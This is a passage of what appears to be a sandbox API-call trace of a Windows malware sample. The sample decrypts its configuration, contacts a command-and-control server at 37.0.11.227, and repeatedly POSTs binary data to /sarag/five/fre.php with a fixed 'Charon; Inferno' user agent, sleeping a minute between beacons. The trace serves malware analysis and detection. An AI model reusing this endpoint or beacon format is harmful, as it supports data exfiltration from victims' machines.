phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0186.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.156] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0186.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.157] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.157] GetProcessHeap () returned 0x690000 [0186.157] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0186.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.163] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0186.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.163] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0186.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.165] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0186.165] GetProcessHeap () returned 0x690000 [0186.165] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0186.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.166] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0186.167] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.167] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0186.167] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.168] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0186.168] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.168] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0186.169] GetProcessHeap () returned 0x690000 [0186.169] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0186.169] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0186.169] GetProcessHeap () returned 0x690000 [0186.169] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0186.170] GetProcessHeap () returned 0x690000 [0186.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0186.171] GetProcessHeap () returned 0x690000 [0186.172] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0186.172] GetProcessHeap () returned 0x690000 [0186.172] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0186.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.173] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0186.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.180] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0186.187] GetProcessHeap () returned 0x690000 [0186.187] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0186.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.189] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0186.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.190] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0186.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.191] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.191] GetProcessHeap () returned 0x690000 [0186.191] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0186.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.193] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0186.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.194] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0186.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.195] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0186.195] GetProcessHeap () returned 0x690000 [0186.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0186.196] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.197] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0186.197] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.198] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0186.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.199] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0186.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.200] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0186.200] GetProcessHeap () returned 0x690000 [0186.200] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0186.200] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3b78*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae868*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0186.201] GetProcessHeap () returned 0x690000 [0186.201] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0186.201] socket (af=2, type=1, protocol=6) returned 0x340 [0186.201] connect (s=0x340, name=0x6ae868*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0186.227] FreeAddrInfoW (pAddrInfo=0x6b3b78*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae868*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0186.227] GetProcessHeap () returned 0x690000 [0186.227] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0186.227] GetProcessHeap () returned 0x690000 [0186.227] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b3f90 [0186.228] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0186.229] wvsprintfA (in: param_1=0x6b3f90, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0186.229] GetProcessHeap () returned 0x690000 [0186.229] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0186.229] GetProcessHeap () returned 0x690000 [0186.230] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0186.230] GetProcessHeap () returned 0x690000 [0186.230] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0186.230] GetProcessHeap () returned 0x690000 [0186.230] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b3f90 [0186.230] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0186.231] wvsprintfA (in: param_1=0x6b3f90, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0186.231] GetProcessHeap () returned 0x690000 [0186.231] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0186.231] GetProcessHeap () returned 0x690000 [0186.232] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0186.232] send (s=0x340, buf=0x6abd08*, len=242, flags=0) returned 242 [0186.232] send (s=0x340, buf=0x6aba40*, len=159, flags=0) returned 159 [0186.232] GetProcessHeap () returned 0x690000 [0186.232] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0186.232] recv (in: s=0x340, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0186.306] GetProcessHeap () returned 0x690000 [0186.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0186.307] GetProcessHeap () returned 0x690000 [0186.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0186.307] GetProcessHeap () returned 0x690000 [0186.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0186.307] GetProcessHeap () returned 0x690000 [0186.308] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0186.308] closesocket (s=0x340) returned 0 [0186.308] GetProcessHeap () returned 0x690000 [0186.308] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0186.308] GetProcessHeap () returned 0x690000 [0186.309] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0186.309] GetProcessHeap () returned 0x690000 [0186.309] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0186.309] GetProcessHeap () returned 0x690000 [0186.309] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0186.309] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x106c) returned 0x340 [0186.311] Sleep (dwMilliseconds=0xea60) [0186.312] GetProcessHeap () returned 0x690000 [0186.312] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0186.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.313] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0186.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.318] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0186.324] GetProcessHeap () returned 0x690000 [0186.324] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0186.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.325] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0186.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.326] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0186.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.327] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.327] GetProcessHeap () returned 0x690000 [0186.327] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0186.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.328] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0186.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.329] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0186.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.330] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0186.330] GetProcessHeap () returned 0x690000 [0186.330] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0186.330] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.331] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0186.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.332] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0186.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.332] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0186.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.334] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0186.334] GetProcessHeap () returned 0x690000 [0186.334] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0186.334] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0186.334] GetProcessHeap () returned 0x690000 [0186.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0186.335] GetProcessHeap () returned 0x690000 [0186.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0186.335] GetProcessHeap () returned 0x690000 [0186.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0186.335] GetProcessHeap () returned 0x690000 [0186.335] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0186.336] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.336] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0186.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.342] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0186.347] GetProcessHeap () returned 0x690000 [0186.347] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0186.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.348] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0186.349] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.349] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0186.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.350] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.350] GetProcessHeap () returned 0x690000 [0186.350] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0186.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.351] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0186.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.352] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0186.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.353] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0186.353] GetProcessHeap () returned 0x690000 [0186.353] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0186.354] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.354] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0186.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.355] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0186.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.356] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0186.356] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.356] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0186.356] GetProcessHeap () returned 0x690000 [0186.357] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0186.357] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3e70*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae838*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0186.357] GetProcessHeap () returned 0x690000 [0186.357] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0186.357] socket (af=2, type=1, protocol=6) returned 0x344 [0186.357] connect (s=0x344, name=0x6ae838*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0186.384] FreeAddrInfoW (pAddrInfo=0x6b3e70*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae838*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0186.384] GetProcessHeap () returned 0x690000 [0186.384] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0186.384] GetProcessHeap () returned 0x690000 [0186.384] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b3f90 [0186.385] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0186.386] wvsprintfA (in: param_1=0x6b3f90, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0186.386] GetProcessHeap () returned 0x690000 [0186.386] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0186.386] GetProcessHeap () returned 0x690000 [0186.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0186.386] GetProcessHeap () returned 0x690000 [0186.386] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0186.386] GetProcessHeap () returned 0x690000 [0186.386] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b3f90 [0186.387] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0186.388] wvsprintfA (in: param_1=0x6b3f90, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0186.388] GetProcessHeap () returned 0x690000 [0186.388] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0186.388] GetProcessHeap () returned 0x690000 [0186.388] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0186.388] send (s=0x344, buf=0x6abd08*, len=242, flags=0) returned 242 [0186.389] send (s=0x344, buf=0x6aba40*, len=159, flags=0) returned 159 [0186.389] GetProcessHeap () returned 0x690000 [0186.389] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0186.389] recv (in: s=0x344, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0186.469] GetProcessHeap () returned 0x690000 [0186.469] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0186.469] GetProcessHeap () returned 0x690000 [0186.469] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0186.470] GetProcessHeap () returned 0x690000 [0186.470] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0186.471] GetProcessHeap () returned 0x690000 [0186.471] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0186.471] closesocket (s=0x344) returned 0 [0186.484] GetProcessHeap () returned 0x690000 [0186.484] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0186.484] GetProcessHeap () returned 0x690000 [0186.485] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0186.486] GetProcessHeap () returned 0x690000 [0186.486] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0186.486] GetProcessHeap () returned 0x690000 [0186.487] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0186.487] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc30) returned 0x344 [0186.490] Sleep (dwMilliseconds=0xea60) [0186.492] GetProcessHeap () returned 0x690000 [0186.492] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0186.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.493] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0186.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.502] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0186.509] GetProcessHeap () returned 0x690000 [0186.510] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0186.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.536] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0186.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.537] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0186.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.538] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.538] GetProcessHeap () returned 0x690000 [0186.538] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0186.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.539] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0186.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.540] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0186.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.541] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0186.541] GetProcessHeap () returned 0x690000 [0186.541] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0186.541] 